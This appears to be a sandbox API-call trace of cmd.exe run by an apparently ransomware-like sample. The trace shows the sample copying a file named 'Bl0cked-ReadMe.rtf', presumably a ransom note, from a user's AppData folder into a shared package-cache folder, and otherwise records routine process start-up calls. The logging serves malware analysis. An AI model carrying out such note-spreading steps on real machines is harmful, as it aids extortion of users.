[0202.337] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0202.337] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0202.337] GetCurrentThreadId () returned 0xe1c [0202.337] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xe1c) returned 0x38 [0202.337] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0202.337] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0202.337] SetThreadUILanguage (LangId=0x0) returned 0x409 [0202.338] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0202.338] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x30fbec | out: phkResult=0x30fbec*=0x0) returned 0x2 [0202.338] VirtualQuery (in: lpAddress=0x30fc23, lpBuffer=0x30fbbc, dwLength=0x1c | out: lpBuffer=0x30fbbc*(BaseAddress=0x30f000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0202.338] VirtualQuery (in: lpAddress=0x210000, lpBuffer=0x30fbbc, dwLength=0x1c | out: lpBuffer=0x30fbbc*(BaseAddress=0x210000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0202.338] VirtualQuery (in: lpAddress=0x211000, lpBuffer=0x30fbbc, dwLength=0x1c | out: lpBuffer=0x30fbbc*(BaseAddress=0x211000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0202.338] VirtualQuery (in: lpAddress=0x213000, lpBuffer=0x30fbbc, dwLength=0x1c | out: lpBuffer=0x30fbbc*(BaseAddress=0x213000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, 
Type=0x20000)) returned 0x1c [0202.338] VirtualQuery (in: lpAddress=0x310000, lpBuffer=0x30fbbc, dwLength=0x1c | out: lpBuffer=0x30fbbc*(BaseAddress=0x310000, AllocationBase=0x310000, AllocationProtect=0x2, RegionSize=0x101000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0202.338] GetConsoleOutputCP () returned 0x1b5 [0202.338] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0202.338] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0202.338] _get_osfhandle (_FileHandle=1) returned 0x7 [0202.338] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0202.338] _get_osfhandle (_FileHandle=1) returned 0x7 [0202.338] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0202.339] _get_osfhandle (_FileHandle=1) returned 0x7 [0202.339] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0202.339] _get_osfhandle (_FileHandle=0) returned 0x3 [0202.339] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0202.339] _get_osfhandle (_FileHandle=0) returned 0x3 [0202.339] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0202.339] GetEnvironmentStringsW () returned 0x4b0190* [0202.339] FreeEnvironmentStringsW (penv=0x4b0190) returned 1 [0202.339] GetEnvironmentStringsW () returned 0x4b0190* [0202.339] FreeEnvironmentStringsW (penv=0x4b0190) returned 1 [0202.339] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x30eb5c | out: phkResult=0x30eb5c*=0x40) returned 0x0 [0202.339] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x30eb64, lpData=0x30eb68, lpcbData=0x30eb60*=0x1000 | out: lpType=0x30eb64*=0x0, lpData=0x30eb68*=0xb8, lpcbData=0x30eb60*=0x1000) returned 0x2 [0202.339] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x30eb64, 
lpData=0x30eb68, lpcbData=0x30eb60*=0x1000 | out: lpType=0x30eb64*=0x4, lpData=0x30eb68*=0x1, lpcbData=0x30eb60*=0x4) returned 0x0 [0202.339] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x30eb64, lpData=0x30eb68, lpcbData=0x30eb60*=0x1000 | out: lpType=0x30eb64*=0x0, lpData=0x30eb68*=0x1, lpcbData=0x30eb60*=0x1000) returned 0x2 [0202.340] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x30eb64, lpData=0x30eb68, lpcbData=0x30eb60*=0x1000 | out: lpType=0x30eb64*=0x4, lpData=0x30eb68*=0x0, lpcbData=0x30eb60*=0x4) returned 0x0 [0202.340] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x30eb64, lpData=0x30eb68, lpcbData=0x30eb60*=0x1000 | out: lpType=0x30eb64*=0x4, lpData=0x30eb68*=0x40, lpcbData=0x30eb60*=0x4) returned 0x0 [0202.340] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x30eb64, lpData=0x30eb68, lpcbData=0x30eb60*=0x1000 | out: lpType=0x30eb64*=0x4, lpData=0x30eb68*=0x40, lpcbData=0x30eb60*=0x4) returned 0x0 [0202.340] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x30eb64, lpData=0x30eb68, lpcbData=0x30eb60*=0x1000 | out: lpType=0x30eb64*=0x0, lpData=0x30eb68*=0x40, lpcbData=0x30eb60*=0x1000) returned 0x2 [0202.340] RegCloseKey (hKey=0x40) returned 0x0 [0202.340] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x30eb5c | out: phkResult=0x30eb5c*=0x40) returned 0x0 [0202.340] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x30eb64, lpData=0x30eb68, lpcbData=0x30eb60*=0x1000 | out: lpType=0x30eb64*=0x0, lpData=0x30eb68*=0x40, lpcbData=0x30eb60*=0x1000) returned 0x2 [0202.340] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x30eb64, lpData=0x30eb68, lpcbData=0x30eb60*=0x1000 | out: lpType=0x30eb64*=0x4, 
lpData=0x30eb68*=0x1, lpcbData=0x30eb60*=0x4) returned 0x0 [0202.340] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x30eb64, lpData=0x30eb68, lpcbData=0x30eb60*=0x1000 | out: lpType=0x30eb64*=0x0, lpData=0x30eb68*=0x1, lpcbData=0x30eb60*=0x1000) returned 0x2 [0202.340] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x30eb64, lpData=0x30eb68, lpcbData=0x30eb60*=0x1000 | out: lpType=0x30eb64*=0x4, lpData=0x30eb68*=0x0, lpcbData=0x30eb60*=0x4) returned 0x0 [0202.340] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x30eb64, lpData=0x30eb68, lpcbData=0x30eb60*=0x1000 | out: lpType=0x30eb64*=0x4, lpData=0x30eb68*=0x9, lpcbData=0x30eb60*=0x4) returned 0x0 [0202.340] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x30eb64, lpData=0x30eb68, lpcbData=0x30eb60*=0x1000 | out: lpType=0x30eb64*=0x4, lpData=0x30eb68*=0x9, lpcbData=0x30eb60*=0x4) returned 0x0 [0202.340] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x30eb64, lpData=0x30eb68, lpcbData=0x30eb60*=0x1000 | out: lpType=0x30eb64*=0x0, lpData=0x30eb68*=0x9, lpcbData=0x30eb60*=0x1000) returned 0x2 [0202.340] RegCloseKey (hKey=0x40) returned 0x0 [0202.340] time (in: timer=0x0 | out: timer=0x0) returned 0x5b8863a4 [0202.340] srand (_Seed=0x5b8863a4) [0202.340] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{33D1F~1\\Bl0cked-ReadMe.rtf\"" [0202.340] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{33D1F~1\\Bl0cked-ReadMe.rtf\"" [0202.340] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0202.340] GetModuleFileNameW (in: 
hModule=0x0, lpFilename=0x4b18f0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0202.341] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0202.341] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0202.341] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0202.341] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0202.341] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0202.341] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0202.341] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0202.341] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0202.341] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0202.341] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0202.341] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0202.341] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0202.341] GetEnvironmentStringsW () returned 0x4b22e0* [0202.341] FreeEnvironmentStringsW (penv=0x4b22e0) returned 1 [0202.341] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0202.341] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0202.341] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0202.341] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0202.341] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0202.341] _wcsicmp 
(_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0202.341] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0202.341] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0202.341] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0202.341] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0202.341] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x30f928 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0202.341] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x30f928, lpFilePart=0x30f924 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x30f924*="Desktop") returned 0x18 [0202.341] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0202.342] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x30f6a4 | out: lpFindFileData=0x30f6a4) returned 0x4b0020 [0202.342] FindClose (in: hFindFile=0x4b0020 | out: hFindFile=0x4b0020) returned 1 [0202.342] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x30f6a4 | out: lpFindFileData=0x30f6a4) returned 0x4b0020 [0202.342] FindClose (in: hFindFile=0x4b0020 | out: hFindFile=0x4b0020) returned 1 [0202.342] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x30f6a4 | out: lpFindFileData=0x30f6a4) returned 0x4b0020 [0202.342] FindClose (in: hFindFile=0x4b0020 | out: hFindFile=0x4b0020) returned 1 [0202.342] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0202.342] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0202.342] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0202.342] GetEnvironmentStringsW () returned 0x4b2b00* [0202.342] FreeEnvironmentStringsW (penv=0x4b2b00) returned 1 [0202.342] 
GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0202.343] GetConsoleOutputCP () returned 0x1b5 [0202.343] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0202.343] GetUserDefaultLCID () returned 0x409 [0202.343] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0202.343] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x30fa68, cchData=128 | out: lpLCData="0") returned 2 [0202.343] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x30fa68, cchData=128 | out: lpLCData="0") returned 2 [0202.343] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x30fa68, cchData=128 | out: lpLCData="1") returned 2 [0202.343] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0202.343] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0202.344] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0202.344] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0202.344] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0202.344] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0202.344] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0202.344] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0202.344] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0202.344] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, 
cchData=8 | out: lpLCData=",") returned 2 [0202.344] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0202.345] GetConsoleTitleW (in: lpConsoleTitle=0x4a08e8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0202.345] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0202.345] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0202.345] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0202.345] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0202.345] _wcsicmp (_String1="type", _String2=")") returned 75 [0202.345] _wcsicmp (_String1="FOR", _String2="type") returned -14 [0202.345] _wcsicmp (_String1="FOR/?", _String2="type") returned -14 [0202.345] _wcsicmp (_String1="IF", _String2="type") returned -11 [0202.346] _wcsicmp (_String1="IF/?", _String2="type") returned -11 [0202.346] _wcsicmp (_String1="REM", _String2="type") returned -2 [0202.346] _wcsicmp (_String1="REM/?", _String2="type") returned -2 [0202.349] _get_osfhandle (_FileHandle=1) returned 0x7 [0202.349] _get_osfhandle (_FileHandle=1) returned 0x7 [0202.349] _get_osfhandle (_FileHandle=1) returned 0x7 [0202.349] GetFileType (hFile=0x7) returned 0x2 [0202.349] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0202.349] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x30f960 | out: lpMode=0x30f960) returned 1 [0202.349] _dup (_FileHandle=1) returned 3 [0202.350] _close (_FileHandle=1) returned 0 [0202.350] _wcsicmp (_String1="C:\\Users\\ALLUSE~1\\PACKAG~1\\{33D1F~1\\Bl0cked-ReadMe.rtf", _String2="con") returned -53 [0202.350] CreateFileW (lpFileName="C:\\Users\\ALLUSE~1\\PACKAG~1\\{33D1F~1\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\alluse~1\\packag~1\\{33d1f~1\\bl0cked-readme.rtf"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x30f930, dwCreationDisposition=0x2, 
dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4c [0202.668] _open_osfhandle (_OSFileHandle=0x4c, _Flags=8) returned 1 [0202.668] GetConsoleTitleW (in: lpConsoleTitle=0x30f760, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0202.668] _wcsicmp (_String1="type", _String2="DIR") returned 16 [0202.668] _wcsicmp (_String1="type", _String2="ERASE") returned 15 [0202.668] _wcsicmp (_String1="type", _String2="DEL") returned 16 [0202.668] _wcsicmp (_String1="type", _String2="TYPE") returned 0 [0202.669] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0202.669] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF", fInfoLevelId=0x1, lpFindFileData=0x30f2c4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x30f2c4) returned 0x4a0e80 [0202.669] _wcsicmp (_String1="BL0CKE~1.RTF", _String2=".") returned 52 [0202.669] _wcsicmp (_String1="BL0CKE~1.RTF", _String2="..") returned 52 [0202.669] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cke~1.rtf")) returned 0x2020 [0202.669] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cked-readme.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x30e1d0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x54 [0202.669] _open_osfhandle (_OSFileHandle=0x54, _Flags=8) returned 4 [0202.669] _get_osfhandle (_FileHandle=4) returned 0x54 [0202.669] GetFileType (hFile=0x54) returned 0x1 [0202.670] _get_osfhandle (_FileHandle=4) returned 0x54 [0202.670] GetFileSize (in: hFile=0x54, lpFileSizeHigh=0x30e228 | out: lpFileSizeHigh=0x30e228*=0x0) returned 0x1632 [0202.670] _get_osfhandle (_FileHandle=4) returned 0x54 [0202.670] 
SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0202.670] _get_osfhandle (_FileHandle=4) returned 0x54 [0202.670] ReadFile (in: hFile=0x54, lpBuffer=0x30f060, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e250, lpOverlapped=0x0 | out: lpBuffer=0x30f060*, lpNumberOfBytesRead=0x30e250*=0x200, lpOverlapped=0x0) returned 1 [0202.671] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.671] GetFileType (hFile=0x4c) returned 0x1 [0202.671] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.671] GetFileType (hFile=0x4c) returned 0x1 [0202.671] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.671] WriteFile (in: hFile=0x4c, lpBuffer=0x30f060*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e244, lpOverlapped=0x0 | out: lpBuffer=0x30f060*, lpNumberOfBytesWritten=0x30e244*=0x50, lpOverlapped=0x0) returned 1 [0202.672] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.672] GetFileType (hFile=0x4c) returned 0x1 [0202.672] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.672] WriteFile (in: hFile=0x4c, lpBuffer=0x30f0b0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e244, lpOverlapped=0x0 | out: lpBuffer=0x30f0b0*, lpNumberOfBytesWritten=0x30e244*=0x50, lpOverlapped=0x0) returned 1 [0202.672] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.672] GetFileType (hFile=0x4c) returned 0x1 [0202.672] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.672] WriteFile (in: hFile=0x4c, lpBuffer=0x30f100*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e244, lpOverlapped=0x0 | out: lpBuffer=0x30f100*, lpNumberOfBytesWritten=0x30e244*=0x50, lpOverlapped=0x0) returned 1 [0202.672] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.672] GetFileType (hFile=0x4c) returned 0x1 [0202.672] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.672] WriteFile (in: hFile=0x4c, lpBuffer=0x30f150*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e244, lpOverlapped=0x0 | 
out: lpBuffer=0x30f150*, lpNumberOfBytesWritten=0x30e244*=0x50, lpOverlapped=0x0) returned 1 [0202.672] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.672] GetFileType (hFile=0x4c) returned 0x1 [0202.672] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.672] WriteFile (in: hFile=0x4c, lpBuffer=0x30f1a0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e244, lpOverlapped=0x0 | out: lpBuffer=0x30f1a0*, lpNumberOfBytesWritten=0x30e244*=0x50, lpOverlapped=0x0) returned 1 [0202.672] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.672] GetFileType (hFile=0x4c) returned 0x1 [0202.672] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.672] WriteFile (in: hFile=0x4c, lpBuffer=0x30f1f0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e244, lpOverlapped=0x0 | out: lpBuffer=0x30f1f0*, lpNumberOfBytesWritten=0x30e244*=0x50, lpOverlapped=0x0) returned 1 [0202.672] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.672] GetFileType (hFile=0x4c) returned 0x1 [0202.672] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.673] WriteFile (in: hFile=0x4c, lpBuffer=0x30f240*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x30e244, lpOverlapped=0x0 | out: lpBuffer=0x30f240*, lpNumberOfBytesWritten=0x30e244*=0x20, lpOverlapped=0x0) returned 1 [0202.673] _get_osfhandle (_FileHandle=4) returned 0x54 [0202.673] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30e230 | out: lpNewFilePointer=0x0) returned 1 [0202.673] _get_osfhandle (_FileHandle=4) returned 0x54 [0202.673] ReadFile (in: hFile=0x54, lpBuffer=0x30f060, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e250, lpOverlapped=0x0 | out: lpBuffer=0x30f060*, lpNumberOfBytesRead=0x30e250*=0x200, lpOverlapped=0x0) returned 1 [0202.673] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.673] GetFileType (hFile=0x4c) returned 0x1 [0202.673] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.673] GetFileType (hFile=0x4c) returned 0x1 [0202.673] _get_osfhandle 
(_FileHandle=1) returned 0x4c [0202.673] WriteFile (in: hFile=0x4c, lpBuffer=0x30f060*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e244, lpOverlapped=0x0 | out: lpBuffer=0x30f060*, lpNumberOfBytesWritten=0x30e244*=0x50, lpOverlapped=0x0) returned 1 [0202.673] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.673] GetFileType (hFile=0x4c) returned 0x1 [0202.673] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.673] WriteFile (in: hFile=0x4c, lpBuffer=0x30f0b0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e244, lpOverlapped=0x0 | out: lpBuffer=0x30f0b0*, lpNumberOfBytesWritten=0x30e244*=0x50, lpOverlapped=0x0) returned 1 [0202.673] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.673] GetFileType (hFile=0x4c) returned 0x1 [0202.673] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.673] WriteFile (in: hFile=0x4c, lpBuffer=0x30f100*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e244, lpOverlapped=0x0 | out: lpBuffer=0x30f100*, lpNumberOfBytesWritten=0x30e244*=0x50, lpOverlapped=0x0) returned 1 [0202.673] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.673] GetFileType (hFile=0x4c) returned 0x1 [0202.673] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.673] WriteFile (in: hFile=0x4c, lpBuffer=0x30f150*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e244, lpOverlapped=0x0 | out: lpBuffer=0x30f150*, lpNumberOfBytesWritten=0x30e244*=0x50, lpOverlapped=0x0) returned 1 [0202.673] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.673] GetFileType (hFile=0x4c) returned 0x1 [0202.673] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.673] WriteFile (in: hFile=0x4c, lpBuffer=0x30f1a0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e244, lpOverlapped=0x0 | out: lpBuffer=0x30f1a0*, lpNumberOfBytesWritten=0x30e244*=0x50, lpOverlapped=0x0) returned 1 [0202.673] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.673] GetFileType (hFile=0x4c) returned 0x1 [0202.673] _get_osfhandle (_FileHandle=1) returned 0x4c 
[0202.673] WriteFile (in: hFile=0x4c, lpBuffer=0x30f1f0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e244, lpOverlapped=0x0 | out: lpBuffer=0x30f1f0*, lpNumberOfBytesWritten=0x30e244*=0x50, lpOverlapped=0x0) returned 1 [0202.674] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.674] GetFileType (hFile=0x4c) returned 0x1 [0202.674] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.674] WriteFile (in: hFile=0x4c, lpBuffer=0x30f240*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x30e244, lpOverlapped=0x0 | out: lpBuffer=0x30f240*, lpNumberOfBytesWritten=0x30e244*=0x20, lpOverlapped=0x0) returned 1 [0202.674] _get_osfhandle (_FileHandle=4) returned 0x54 [0202.674] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30e230 | out: lpNewFilePointer=0x0) returned 1 [0202.674] _get_osfhandle (_FileHandle=4) returned 0x54 [0202.674] ReadFile (in: hFile=0x54, lpBuffer=0x30f060, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e250, lpOverlapped=0x0 | out: lpBuffer=0x30f060*, lpNumberOfBytesRead=0x30e250*=0x200, 